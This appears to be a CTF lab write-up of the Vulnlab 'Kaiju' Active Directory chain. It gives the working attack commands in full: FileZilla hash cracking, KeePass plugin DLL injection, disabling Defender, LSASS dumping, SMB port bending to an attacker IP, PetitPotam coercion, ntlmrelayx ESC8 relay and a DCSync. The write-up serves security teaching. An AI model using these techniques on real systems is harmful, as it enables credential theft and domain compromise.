Vulnlab — Kaiju

ARZ101
10 min read · Mar 31, 2024

Kaiju is a hard-rated AD chain. It involves enumerating an FTP server with default credentials to find a FileZilla configuration file containing a password hash, logging into BERSRV200 and finding the FileZilla Server admin's hash, changing the server configuration to get access to sasrv200's home directory, reading the local administrator's password by injecting a DLL as a plugin into the KeePass process, dumping LSASS to find a domain user, and enumerating ADCS, where web enrollment was enabled. With port bending redirecting all incoming SMB traffic to the Kali machine, coercion becomes possible and ESC8 can be abused.

BERSRV100.kaiju.vl

PORT     STATE SERVICE       VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-03-03T20:29:34+00:00; -10s from scanner time.
| rdp-ntlm-info:
| Target_Name: KAIJU
| NetBIOS_Domain_Name: KAIJU
| NetBIOS_Computer_Name: BERSRV100
| DNS_Domain_Name: kaiju.vl
| DNS_Computer_Name: BERSRV100.kaiju.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-03-03T20:29:30+00:00
| ssl-cert: Subject: commonName=BERSRV100.kaiju.vl
| Issuer: commonName=BERSRV100.kaiju.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-25T20:07:28
| Not valid after: 2024-06-25T20:07:28
| MD5: 6276d99a6b5df445831fb4edf399740b
|_SHA-1: e4d1f05a3c0acb5c6cbb96e4e8a5664a58ff5a7f
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

BERSRV200.kaiju.vl

21/tcp   open  ftp?
| ssl-cert: Subject: commonName=filezilla-server self signed certificate
| Issuer: commonName=filezilla-server self signed certificate
| Public Key type: ec
| Public Key bits: 256
| Signature Algorithm: ecdsa-with-SHA256
| Not valid before: 2023-12-17T14:33:49
| MD5: 96eb4628bac77bd6ad46b498002002fd
|_SHA-1: ad8550b5089e34a78bb9d8ef3a67668cc3dc5502
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, NULL, RPCCheck, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| 220-FileZilla Server 1.8.0
| Please visit https://filezilla-project.org/
| GetRequest:
| 220-FileZilla Server 1.8.0
| Please visit https://filezilla-project.org/
| What are you trying to do? Go away.
| HTTPOptions, RTSPRequest:
| 220-FileZilla Server 1.8.0
| Please visit https://filezilla-project.org/
| Wrong command.
| Help:
| 220-FileZilla Server 1.8.0
22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 08c7c66a51482a073f9e880ce2ff2cb9 (RSA)
| 256 7596f0688a0369abe49b3e5a17a8ab24 (ECDSA)
|_ 256 d48eadd323a97b7b7b169f86cbaba355 (ED25519)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=BERSRV200.kaiju.vl
| Issuer: commonName=BERSRV200.kaiju.vl

BERSRV105.kaiju.vl

3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: KAIJU
| NetBIOS_Domain_Name: KAIJU
| NetBIOS_Computer_Name: BERSRV105
| DNS_Domain_Name: kaiju.vl
| DNS_Computer_Name: BERSRV105.kaiju.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-03-03T20:35:39+00:00
| ssl-cert: Subject: commonName=BERSRV105.kaiju.vl
| Issuer: commonName=BERSRV105.kaiju.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-20T14:50:42
| Not valid after: 2024-07-21T14:50:42
| MD5: 75ab9d8dcba8f772b61a263ae82b1cfa
|_SHA-1: 189c63c9071bab279700c2df14082b4931ce7724
|_ssl-date: 2024-03-03T20:35:44+00:00; -9s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

The BERSRV200.kaiju.vl host has an FTP service enabled, but anonymous login didn't work

Trying different default logins from HackTricks

Here logging in with the username ftp worked and didn't require any password

From the passwords directory, we see a few text files

We don't get anything other than a hint that the local administrator's password is saved in KeePass; from the config directory, we have users.xml

Here we have a user named backup with his password hash. Searching for FileZilla hashes on the hashcat wiki showed a different hash format, which only applies to versions up to 0.9.55

Searching the FileZilla forums we can learn that PBKDF2-HMAC-SHA256 is used for password hashing in version 1.8.0

This can be cracked in hashcat with mode 10900 by formatting the hash like this:

sha256:iterations:base64 salt:base64 digest

We just need to convert the values from users.xml into that format

sha256:100000:aec9Yt49edyEvXkZUinmS52UrwNoNNgoM+6rK3fuFFw:ZqRNhkBO8d4VYJb0YmF7cJgjECAH43MHdNABkHYjNFU

But cracking this hash with rockyou.txt didn't work: hashcat estimated about 20 hours for this single hash, since each guess costs 100,000 PBKDF2 iterations

Getting a shell as backup user

So, taking a hint from the Vulnlab forums, we may need to come up with a custom wordlist. But what should the custom list be? We know this is the password for the backup user, and the files from FTP included passwords like firewall123, so combining the box name, the username and the year we can create a list

kaiju123
kaiju
kaiju2023
kaiju2024
backup
backup2023
backup2024

Also applying hashcat rules to this list to crack the hash

hashcat -a 0 -m 10900 ./hash.txt custom_list -r hob064.rule  --force
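As an added example (not part of the original write-up), the following Python script does the users.xml-to-hashcat conversion described above and then tests a small custom list like the one above against the hash offline, so the 10900 format can be validated before a long hashcat run. The element names (user, password, hash, salt, iterations) are assumed from the description of users.xml, the sample file is constructed inside the script rather than taken from the target, and the candidate generator is only a tiny stand-in for a hashcat rule file. It emits padded base64, which is what hashcat's own 10900 example hash uses.

```python
# Added example, not code from the original write-up: convert a FileZilla Server
# 1.x users.xml entry into a hashcat -m 10900 line and test a small custom
# candidate list against it offline (PBKDF2-HMAC-SHA256, as the write-up notes).
# The XML element names are assumed from the description; the sample file is
# constructed here, not copied from the target.
import base64
import hashlib
import hmac
import xml.etree.ElementTree as ET
from typing import Iterable, List, Optional

DKLEN = 32  # 32-byte derived key, matching the stored SHA-256-sized hash


def pbkdf2_sha256(password: str, salt: bytes, iterations: int) -> bytes:
    """Derive the stored hash the way the 1.8.0 server does (PBKDF2-HMAC-SHA256)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, DKLEN)


def make_sample_users_xml(name: str, password: str, salt: bytes,
                          iterations: int = 100000) -> str:
    """Constructed users.xml in the assumed FileZilla 1.x layout (hash/salt base64)."""
    digest = pbkdf2_sha256(password, salt, iterations)
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<filezilla>\n  <users>\n"
        f'    <user name="{name}">\n'
        '      <password index="1">\n'
        f"        <hash>{base64.b64encode(digest).decode()}</hash>\n"
        f"        <salt>{base64.b64encode(salt).decode()}</salt>\n"
        f"        <iterations>{iterations}</iterations>\n"
        "      </password>\n    </user>\n  </users>\n</filezilla>\n"
    )


def parse_users_xml(xml_text: str) -> List[dict]:
    """One record per user: name plus decoded salt, decoded hash and iteration count."""
    records = []
    for user in ET.fromstring(xml_text).iter("user"):
        pw = user.find("password")
        if pw is None:
            continue
        records.append({
            "user": user.get("name"),
            "hash": base64.b64decode(pw.findtext("hash")),
            "salt": base64.b64decode(pw.findtext("salt")),
            "iterations": int(pw.findtext("iterations")),
        })
    return records


def to_hashcat_10900(rec: dict) -> str:
    """hashcat mode 10900 line: sha256:<iterations>:<base64 salt>:<base64 digest>."""
    return "sha256:{}:{}:{}".format(
        rec["iterations"],
        base64.b64encode(rec["salt"]).decode(),
        base64.b64encode(rec["hash"]).decode(),
    )


def check_candidate(rec: dict, candidate: str) -> bool:
    """Recompute the derived key for one guess and compare in constant time."""
    guess = pbkdf2_sha256(candidate, rec["salt"], rec["iterations"])
    return hmac.compare_digest(guess, rec["hash"])


def custom_candidates(words: Iterable[str], years=("2023", "2024"),
                      suffixes=("", "123", "!")) -> List[str]:
    """Tiny stand-in for a hashcat rule file: word/Word, optional year, optional suffix."""
    out: List[str] = []
    for w in words:
        for base in (w, w.capitalize()):
            for y in ("",) + tuple(years):
                for s in suffixes:
                    c = f"{base}{y}{s}"
                    if c not in out:
                        out.append(c)
    return out


def crack(rec: dict, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate that reproduces the stored hash, else None."""
    for c in candidates:
        if check_candidate(rec, c):
            return c
    return None


if __name__ == "__main__":
    # Constructed sample: user "backup" with a box-name-plus-year style password.
    sample = make_sample_users_xml("backup", "Kaiju2024!", bytes(range(32)))
    rec = parse_users_xml(sample)[0]
    print(to_hashcat_10900(rec))
    print(crack(rec, custom_candidates(["kaiju", "backup"])))
```

Running it prints the hashcat line for the constructed entry followed by the recovered password. Each call to check_candidate costs the full iteration count, which is exactly why a targeted list beats rockyou.txt here: 36 guesses take a couple of seconds, while 14 million take most of a day.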

Now we can SSH as the backup user into the BERSRV200.kaiju.vl host

Going back to the FileZilla configuration file, we can see there's a drive E:\

This drive holds the FileZilla Server directory; from the logs we can tell that the server is running as the sasrv200 user

And from install.log we can find the FileZilla Server admin password hash

sha256:100000:AdRNx7rAs1CEM23S5Zp7NyAQYHcuo2LuevU3pAXKB18:mSbrgj1R6oqMMSk4Qk1TuYTchS5r8Yk3Y5vsBgf2tF8:

This hash can also be cracked using the same list and rules we created

The port for the administration interface is 14148, which can be confirmed from the logs

Abusing filezilla to escalate as SASRV200

Since this interface only listens locally, we need to forward the port through SSH

ssh -L 4444:localhost:14148 backup@BERSRV200.kaiju.vl

Using the FileZilla Server 1.8.0 GUI (filezilla-server-gui) we can access the administration interface on port 4444

But on interacting with anything it kept showing this error

We can still add our own access by exporting the configuration file, editing it, and importing it again with the changes

Since the server runs as sasrv200, we change the mount path to C:\Users\sasrv200

Accessing FTP as the backup user, we now land in sasrv200's home directory with write permissions

Here we can just create a .ssh folder, place our SSH public key in authorized_keys and log in as sasrv200. Note that Windows OpenSSH's default sshd_config only honours a user's own authorized_keys for accounts outside the local Administrators group; for administrators it reads C:\ProgramData\ssh\administrators_authorized_keys instead.

Reading local admin password through keepass

To escalate our privileges, recall the note saying the local administrator password was moved to KeePass; we can find it.kdbx on the E:\ drive

Copying this file to sasrv200's directory and then downloading it through FTP

Extracting a john/hashcat hash from it to crack the master password, but that didn't work: the hash was not crackable with our lists

Going back to the KeePass directory, there's a Plugins folder owned by sasrv200, so we have write permissions on it

Checking the running processes with Get-Process, there's nothing related to KeePass, but if we monitor continuously we keep seeing this process being spawned

# Poll once a second and list any process whose name contains "keepass";
# KeePass is only alive briefly, so a single Get-Process call misses it
while ($true) {
    Clear-Host
    Write-Host "Monitoring running processes containing 'keepass':"
    $Process = Get-Process | Where-Object { $_.ProcessName -like '*keepass*' }
    $Process | Format-Table -AutoSize
    Start-Sleep -Seconds 1
}

This could also be monitored with Winpspy, but we can move on now that we know KeePass is run regularly. Since we have write access to the Plugins folder, we can abuse this by compiling a DLL that exports the contents of the KeePass database once it is loaded into the KeePass process, and by enabling the plugin and export policies in KeePass.config.xml

To use KeeFarceReborn, we need to retrieve KeePass.exe from the target machine (the plugin is built against it as a reference assembly), edit the source code to remove the message boxes, and change the path where we want the XML file written

Going to C:\ProgramData, we'll find export.xml containing the local admin password

Having the password, we can log in as the local administrator on BERSRV200. To dump hashes we need SSH dynamic port forwarding, as most of the services are only reachable from inside the network

ssh administrator@BERSRV200 -D 1080

In proxychains.conf, make sure the socks entry uses the port you specified for dynamic port forwarding (1080 here)

Dumping LSASS through the lsassy module did not work because Defender is enabled

Since we are already local admin, we can just disable Defender

Uploading SharpHound.exe through FTP and running it with sasrv200's plaintext password

SharpHound.exe --ldapusername sasrv200 --ldappassword pass -d kaiju.vl -c all

BloodHound doesn't bring up anything interesting apart from claire.forst being able to RDP into BERSRV200, which seems useless as we already have local admin on that host

But we can use this user's hash from the LSASS dump to check whether there's an ADCS server in this domain

proxychains nxc ldap BERSRV100.kaiju.vl -u Clare.Frost -H ':hash' -M adcs

Checking for vulnerable templates with Certipy

Abusing ESC8 Through Port Bending

This doesn't show any vulnerable templates, but web enrollment is enabled, which can be abused (ESC8): coerce the domain controller into authenticating to us with any coercion PoC, then relay that machine-account authentication to the ADCS web enrollment endpoint to obtain a certificate for the DC. The problem is that the coerced connection can't reach our machine directly, so it has to arrive on BERSRV200 instead; we therefore redirect traffic arriving on port 445 of BERSRV200 to a different destination (port mapping / port bending) and add a remote or reverse port forward, depending on whether we redirect locally or straight to our host. A plain netsh portproxy rule can't do this, because the Windows SMB server already owns port 445; StreamDivert works underneath it on the WinDivert driver, so it can be used for port bending here. The required files can be transferred via FTP or SCP, or by disabling firewall rules.

We are going to redirect all traffic arriving on port 445 to our Kali IP; the StreamDivert config file looks like this

tcp < 445 0.0.0.0 -> 10.8.0.136 445

To confirm that coercion works, start Responder with its SMB server set to On

Using PetitPotam for coercion

Now that we have confirmed coercion is working, we can relay this authentication to the ADCS server using ntlmrelayx, after turning the SMB and HTTP servers off in Responder so it does not grab the connection first

proxychains ntlmrelayx.py -t http://BERSRV105.kaiju.vl/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

We'll receive the DC's certificate, through which we can request a TGT (and the AES key) for the domain controller's machine account via PKINIT, and then perform DCSync

proxychains python3 /opt/PKINITtools/gettgtpkinit.py -pfx-base64 $(cat ./DC.b64) -dc-ip 10.10.210.133 kaiju.vl/'BERSRV100$' dc.ccache

Using the TGT to dump the administrator's hash, after pointing the KRB5CCNAME environment variable at dc.ccache so that secretsdump picks up the ticket

proxychains secretsdump.py -k -no-pass kaiju.vl/'BERSRV100$'@BERSRV100.kaiju.vl
